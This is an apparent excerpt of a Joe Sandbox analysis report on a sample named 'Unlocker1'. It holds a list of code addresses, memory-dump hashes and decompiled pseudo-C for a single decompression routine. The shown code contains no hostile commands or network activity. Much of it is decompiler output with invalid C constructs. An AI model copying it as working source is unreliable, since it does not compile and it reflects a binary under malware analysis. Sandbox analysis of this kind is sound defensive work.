                                                                                                                                                              0x00406127
                                                                                                                                                              0x0040612a
                                                                                                                                                              0x0040612d
                                                                                                                                                              0x00406130
                                                                                                                                                              0x00406133
                                                                                                                                                              0x00406136
                                                                                                                                                              0x00406139
                                                                                                                                                              0x0040613c
                                                                                                                                                              0x0040613f
                                                                                                                                                              0x00406142
                                                                                                                                                              0x00406145
                                                                                                                                                              0x0040615d
                                                                                                                                                              0x00406160
                                                                                                                                                              0x00406163
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406166
                                                                                                                                                              0x00406169
                                                                                                                                                              0x0040616d
                                                                                                                                                              0x0040616f
                                                                                                                                                              0x00406147
                                                                                                                                                              0x00406147
                                                                                                                                                              0x0040614f
                                                                                                                                                              0x00406154
                                                                                                                                                              0x00406156
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406158
                                                                                                                                                              0x00406172
                                                                                                                                                              0x00406179
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040617e
                                                                                                                                                              0x0040617c
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00406183
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061be
                                                                                                                                                              0x004061c2
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067ca
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x004061cb
                                                                                                                                                              0x004061ce
                                                                                                                                                              0x004061d2
                                                                                                                                                              0x004061d5
                                                                                                                                                              0x004061db
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061dd
                                                                                                                                                              0x004061e0
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e3
                                                                                                                                                              0x004061e9
                                                                                                                                                              0x00406187
                                                                                                                                                              0x00406187
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618a
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061eb
                                                                                                                                                              0x004061ee
                                                                                                                                                              0x004061f1
                                                                                                                                                              0x004061f4
                                                                                                                                                              0x004061f7
                                                                                                                                                              0x004061fa
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406203
                                                                                                                                                              0x00406206
                                                                                                                                                              0x00406209
                                                                                                                                                              0x00406221
                                                                                                                                                              0x00406224
                                                                                                                                                              0x00406227
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x0040622d
                                                                                                                                                              0x00406231
                                                                                                                                                              0x00406233
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x0040620b
                                                                                                                                                              0x00406213
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621a
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x0040621c
                                                                                                                                                              0x00406236
                                                                                                                                                              0x0040623d
                                                                                                                                                              0x00406240
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406242
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064cf
                                                                                                                                                              0x004064d3
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067fa
                                                                                                                                                              0x004064d9
                                                                                                                                                              0x004064dc
                                                                                                                                                              0x004064df
                                                                                                                                                              0x004064e3
                                                                                                                                                              0x004064e6
                                                                                                                                                              0x004064ec
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064ee
                                                                                                                                                              0x004064f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065de
                                                                                                                                                              0x004065e2
                                                                                                                                                              0x00406604
                                                                                                                                                              0x00406607
                                                                                                                                                              0x00406611
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406611
                                                                                                                                                              0x004065e4
                                                                                                                                                              0x004065e7
                                                                                                                                                              0x004065eb
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065ee
                                                                                                                                                              0x004065f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040669b
                                                                                                                                                              0x0040669f
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066bd
                                                                                                                                                              0x004066c4
                                                                                                                                                              0x004066cb
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d2
                                                                                                                                                              0x004066a1
                                                                                                                                                              0x004066a4
                                                                                                                                                              0x004066a7
                                                                                                                                                              0x004066aa
                                                                                                                                                              0x004066b1
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f5
                                                                                                                                                              0x004065f8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040678c
                                                                                                                                                              0x0040678f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063c6
                                                                                                                                                              0x004063c8
                                                                                                                                                              0x004063cf
                                                                                                                                                              0x004063d0
                                                                                                                                                              0x004063d2
                                                                                                                                                              0x004063d5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004063dd
                                                                                                                                                              0x004063e0
                                                                                                                                                              0x004063e3
                                                                                                                                                              0x004063e5
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e7
                                                                                                                                                              0x004063e8
                                                                                                                                                              0x004063eb
                                                                                                                                                              0x004063f2
                                                                                                                                                              0x004063f5
                                                                                                                                                              0x00406403
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066d9
                                                                                                                                                              0x004066dc
                                                                                                                                                              0x004066e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066e8
                                                                                                                                                              0x004066ec
                                                                                                                                                              0x00406824
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406824
                                                                                                                                                              0x004066f2
                                                                                                                                                              0x004066f5
                                                                                                                                                              0x004066f8
                                                                                                                                                              0x004066fc
                                                                                                                                                              0x004066ff
                                                                                                                                                              0x00406705
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x00406707
                                                                                                                                                              0x0040670a
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x0040670d
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406710
                                                                                                                                                              0x00406714
                                                                                                                                                              0x00406774
                                                                                                                                                              0x00406777
                                                                                                                                                              0x0040677c
                                                                                                                                                              0x0040677d
                                                                                                                                                              0x0040677f
                                                                                                                                                              0x00406781
                                                                                                                                                              0x00406784
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406784
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671c
                                                                                                                                                              0x0040671f
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x00406728
                                                                                                                                                              0x0040672b
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406731
                                                                                                                                                              0x00406734
                                                                                                                                                              0x00406737
                                                                                                                                                              0x00406750
                                                                                                                                                              0x00406753
                                                                                                                                                              0x00406756
                                                                                                                                                              0x00406759
                                                                                                                                                              0x0040675d
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x0040675f
                                                                                                                                                              0x00406760
                                                                                                                                                              0x00406763
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406739
                                                                                                                                                              0x00406741
                                                                                                                                                              0x00406746
                                                                                                                                                              0x00406748
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x0040674b
                                                                                                                                                              0x00406766
                                                                                                                                                              0x0040676d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040676f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040640b
                                                                                                                                                              0x0040640e
                                                                                                                                                              0x00406444
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406574
                                                                                                                                                              0x00406577
                                                                                                                                                              0x00406577
                                                                                                                                                              0x0040657a
                                                                                                                                                              0x0040657c
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406806
                                                                                                                                                              0x00406582
                                                                                                                                                              0x00406585
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040658b
                                                                                                                                                              0x0040658f
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406592
                                                                                                                                                              0x00406410
                                                                                                                                                              0x00406412
                                                                                                                                                              0x00406414
                                                                                                                                                              0x00406416
                                                                                                                                                              0x00406419
                                                                                                                                                              0x0040641a
                                                                                                                                                              0x0040641c
                                                                                                                                                              0x0040641e
                                                                                                                                                              0x00406421
                                                                                                                                                              0x00406424
                                                                                                                                                              0x0040643a
                                                                                                                                                              0x0040643f
                                                                                                                                                              0x00406477
                                                                                                                                                              0x00406477
                                                                                                                                                              0x0040647b
                                                                                                                                                              0x004064a7
                                                                                                                                                              0x004064a9
                                                                                                                                                              0x004064b0
                                                                                                                                                              0x004064b3
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064b6
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bb
                                                                                                                                                              0x004064bd
                                                                                                                                                              0x004064c0
                                                                                                                                                              0x004064c7
                                                                                                                                                              0x004064ca
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064f7
                                                                                                                                                              0x004064fa
                                                                                                                                                              0x004064fd
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00406571
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406571
                                                                                                                                                              0x004064ff
                                                                                                                                                              0x00406505
                                                                                                                                                              0x00406508
                                                                                                                                                              0x0040650b
                                                                                                                                                              0x0040650e
                                                                                                                                                              0x00406511
                                                                                                                                                              0x00406514
                                                                                                                                                              0x00406517
                                                                                                                                                              0x0040651a
                                                                                                                                                              0x0040651d
                                                                                                                                                              0x00406520
                                                                                                                                                              0x00406539
                                                                                                                                                              0x0040653b
                                                                                                                                                              0x0040653e
                                                                                                                                                              0x0040653f
                                                                                                                                                              0x00406542
                                                                                                                                                              0x00406544
                                                                                                                                                              0x00406547
                                                                                                                                                              0x00406549
                                                                                                                                                              0x0040654b
                                                                                                                                                              0x0040654e
                                                                                                                                                              0x00406550
                                                                                                                                                              0x00406553
                                                                                                                                                              0x00406557
                                                                                                                                                              0x00406559
                                                                                                                                                              0x00406559
                                                                                                                                                              0x0040655a
                                                                                                                                                              0x0040655d
                                                                                                                                                              0x00406560
                                                                                                                                                              0x00406522
                                                                                                                                                              0x00406522
                                                                                                                                                              0x0040652a
                                                                                                                                                              0x0040652f
                                                                                                                                                              0x00406531
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406534
                                                                                                                                                              0x00406563
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x004064f4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040656c
                                                                                                                                                              0x0040656a
                                                                                                                                                              0x0040647d
                                                                                                                                                              0x00406480
                                                                                                                                                              0x00406482
                                                                                                                                                              0x00406485
                                                                                                                                                              0x00406488
                                                                                                                                                              0x0040648b
                                                                                                                                                              0x0040648d
                                                                                                                                                              0x00406490
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406493
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406496
                                                                                                                                                              0x00406499
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00406474
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004064a2
                                                                                                                                                              0x004064a0
                                                                                                                                                              0x00406426
                                                                                                                                                              0x00406429
                                                                                                                                                              0x0040642b
                                                                                                                                                              0x0040642e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x0040618d
                                                                                                                                                              0x00406191
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004067d6
                                                                                                                                                              0x00406197
                                                                                                                                                              0x0040619a
                                                                                                                                                              0x0040619d
                                                                                                                                                              0x004061a0
                                                                                                                                                              0x004061a3
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061a9
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061ae
                                                                                                                                                              0x004061b1
                                                                                                                                                              0x004061b4
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x004061b6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406595
                                                                                                                                                              0x00406599
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040659f
                                                                                                                                                              0x004065a2
                                                                                                                                                              0x004065a5
                                                                                                                                                              0x004065a8
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065aa
                                                                                                                                                              0x004065ad
                                                                                                                                                              0x004065b0
                                                                                                                                                              0x004065b3
                                                                                                                                                              0x004065b6
                                                                                                                                                              0x004065b9
                                                                                                                                                              0x004065bc
                                                                                                                                                              0x004065bd
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065bf
                                                                                                                                                              0x004065c2
                                                                                                                                                              0x004065c5
                                                                                                                                                              0x004065c8
                                                                                                                                                              0x004065cb
                                                                                                                                                              0x004065ce
                                                                                                                                                              0x004065d2
                                                                                                                                                              0x004065d4
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004065d9
                                                                                                                                                              0x004065d7
                                                                                                                                                              0x0040680c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405e3b

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                                                              • Instruction ID: c975835c63a62796fcb7e955cfffcd5e326eaa1512836fcadbce1623bdfadb04
                                                                                                                                                              • Opcode Fuzzy Hash: a5c1a6d88fbf3736e083e35a306841f5f7567a3339756a66f66144e6d7487cc4
                                                                                                                                                              • Instruction Fuzzy Hash: AF816671D00229CFDF24CFA8C8447AEBBB1FB44305F25816AD856BB281C7789A86DF54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00405DF9 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00405DF9(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040684B))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
